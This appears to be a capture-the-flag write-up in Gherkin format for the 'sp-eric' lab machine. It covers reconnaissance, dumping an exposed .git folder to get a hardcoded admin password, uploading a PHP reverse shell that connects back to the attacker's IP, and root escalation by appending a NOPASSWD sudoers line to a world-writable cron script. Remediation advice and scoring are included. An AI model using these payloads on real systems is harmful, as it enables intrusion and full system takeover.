## Version 1.4.1
## language: en

Feature:
  TOE:
    sp-eric
  Location:
    http://192.168.56.107.com/admin.php
  CWE:
    CWE-732: Incorrect Permission Assignment for Critical Resource
  Rule:
    REQ.096: https://fluidattacks.com/products/rules/list/096/
  Goal:
    Get remote connection and root privileges
  Recommendation:
    Must be careful with critical files with incorrect privileges

  Background:
  Hacker's software:
    | <Software name> | <Version>   |
    | Kali            | 2021.1      |
    | Firefox         | 78.9.0esr   |
    | Nmap            | 7.91        |
    | DIRB            | 2.22        |
    | Netcat          | 1.10        |
    | VirtualBox      | 6.1         |
  TOE information:
    Given I have the machine Lab running on VirtualBox [evidence](01.png)
    And It is in my network
    Then I decide to scan my network to find which ip was assigned to it
    And I use the next Nmap command to do it
    """
    nmap 192.168.56.0/24
    """
    And I got the result
    """
    Nmap scan report for 192.168.56.107
    Host is up (0.00055s latency).
    Not shown: 998 closed ports
    PORT   STATE SERVICE
    22/tcp open  ssh
    80/tcp open  http
    """
    Then I know its ip is 192.168.56.107
    And It has ports 22 (ssh) and 80 (http) opened

  Scenario: Normal use case
    Given Http is working on port 80
    Then I access to http://192.168.56.107
    And I see the webpage [evidence](02.png)

  Scenario: Static detection
    Given I can access to the source code in the main webpage
    When I analyze its content
    But I can't see any relevant

  Scenario: Dynamic detection
    Given I can't see any relevant on the source code
    Then I use DIRB to scan possible directories and paths with the command
    """
    dirb http://192.168.56.107
    """
    And I get the next paths and directories
    """
    ---- Scanning URL: http://192.168.56.107/ ----

    + http://192.168.56.107/.git/HEAD (CODE:200|SIZE:23)
    + http://192.168.56.107/admin.php (CODE:200|SIZE:306)
    + http://192.168.56.107/index.php (CODE:200|SIZE:281)
    + http://192.168.56.107/server-status (CODE:403|SIZE:302)

    ==> DIRECTORY: http://192.168.56.107/upload/

    ---- Entering directory: http://192.168.56.107/upload/ ----
    """
    Then I check the paths
    And I notice there is a login in /admin.php path [evidence](03.png)
    Then I try to access using common words
    And I see and advise [evidence](04.png)
    And I stop trying that way
    Then I know there is a .git path
    And I search about vulnerabilities related with This
    And I found I can extract the git files using GitTools
    Then I download the tool
    And I use it with the next commands
    """
    ./gitdumper.sh http://192.168.56.107/.git/ eric
    ./extractor.sh ../Dumper/eric ./eric
    """
    And I get
    """
    ###########
    # Extractor is part of https://github.com/internetwache/GitTools
    #
    # Developed and maintained by @gehaxelt from @internetwache
    #
    # Use at your own risk. Usage might be illegal in certain circumstances.
    # Only for educational purposes!
    ###########
    [*] Destination folder does not exist
    [*] Creating...
    [+] Found commit: cc1ab96950f56d1fff0d1f006821cab6b6b0e249
    [+] Found file: /home/aletroz/Desktop/GitTools-master/Extractor/./eric
    /0-cc1ab96950f56d1fff0d1f006821cab6b6b0e249/index.php
    [+] Found commit: 3db5628b550f5c9c9f6f663cd158374035a6eaa0
    [+] Found file: /home/aletroz/Desktop/GitTools-master/Extractor/./eric
    /1-3db5628b550f5c9c9f6f663cd158374035a6eaa0/admin.php
    [+] Found file: /home/aletroz/Desktop/GitTools-master/Extractor/./eric
    /1-3db5628b550f5c9c9f6f663cd158374035a6eaa0/index.php
    [+] Found commit: a89a716b3c21d8f9fee38a0693afb22c75f1d31c
    [+] Found file: /home/aletroz/Desktop/GitTools-master/Extractor/./eric
    /2-a89a716b3c21d8f9fee38a0693afb22c75f1d31c/admin.php
    [+] Found file: /home/aletroz/Desktop/GitTools-master/Extractor/./eric
    /2-a89a716b3c21d8f9fee38a0693afb22c75f1d31c/index.php
    """
    And I see I got the admin.php file
    Then I check the file and I found the next interesting section  of code
    """
    if ($_POST['submit']) {
      if ($_POST['username'] == 'admin' &&
        $_POST['password'] == 'st@mpch0rdt.ightiRu$glo0mappL3') {
        $_SESSION['auth'] = 1;
      } else {
        exit("Wrong username and/or password.
          Don't even bother bruteforcing.");
      }
    }
    """
    And I can see the username and the password
    Then I use them to login and can access to the page [evidence](05.png)
    And I notice that this page use the same path /admin.php
    Then I check again the code and I found the next
    """
    // Todo: Make sure it is only allowed to upload images.
    if ($_POST['submit_post']) {
      if (move_uploaded_file($_FILES['image']['tmp_name'],
        'upload/' . $_FILES['image']['name'])) {
      }
    }
    """
    And I notice that the page is uploading files to upload/ directory
    And It is not checking file types
    Given I executed DIRB command
    And I have access to an upload directory
    Then I try to upload an image called test.png
    And I access it through the path http://192.168.56.107/upload/test.png
    And I get the image [evidence](06.png)
    And I know I can upload files to the server and call them
    Then I search about how can I use it
    And I found I can make a reverse shell
    Then I create a reverse_shell.php file
    And I put the code for reverse shell with my attack box ip and chosen port
    """
    <?php
    $sock = fsockopen("192.168.56.105",1234);
    $proc = proc_open("/bin/sh -i",
      array(0=>$sock, 1=>$sock, 2=>$sock), $pipes);
    ?>
    """
    And I upload the file
    Then I start a Netcat listener in that port using the command
    """
    nc -lvp 1234
    """
    And I access the file in http://192.168.56.107/upload/reverse_shell.php
    And I connect with the remote server as www-data user [evidence](07.png)
    And I look into directories for something useful [evidence](08.png)
    Then I check the files
    And I notice that backup.zip file has a current timestamp
    And I check the backup.sh file and it has all privileges
    And I its content indicates that it creates the backup.zip file
    """
    $ cat backup.sh
    #!/bin/bash
    zip -r /home/eric/backup.zip /var/www/html
    """
    Then I notice the backup.zip timestamp is changing around each 3 minutes
    And I conclude backup.sh is being executed periodically [evidence](09.png)
    Given I have write privileges over this file
    And It has root privileges for execution
    Then I can edit it to execute any command without having the root password

  Scenario: Exploitation
    Given I am connected as www-data user
    And I can edit backup.sh to execute any command
    Then I can edit this file to add NOPASSWD permission to sudoers file
    And It will let to www-data to scale to root without password
    Then I edit the file using the command
    """
    echo "echo 'www-data ALL=(ALL) NOPASSWD: ALL' >> /etc/sudoers" >>backup.sh
    """
    And I wait 3 minutes until its execution
    And I use the command
    """
    sudo su
    """
    Then I am root [evidence](10.png)

  Scenario: Remediation
    Given I have access to an user
    And There is a file with privileges for all users
    Then The root user should change the permissions over that file
    And Users mustn't have write privileges over it

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    8.7/10 (High) - AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:L/
  Temporal: Attributes that measure the exploit's popularity and fixability
    8.0/10 (High) - E:H/RL:O/RC:R/
  Environmental: Unique and relevant attributes to a specific user environment
    7.4/10 (High) - CR:L/IR:M/AR:M

  Scenario: Correlations
    No correlations have been found to this date 2021-03-31
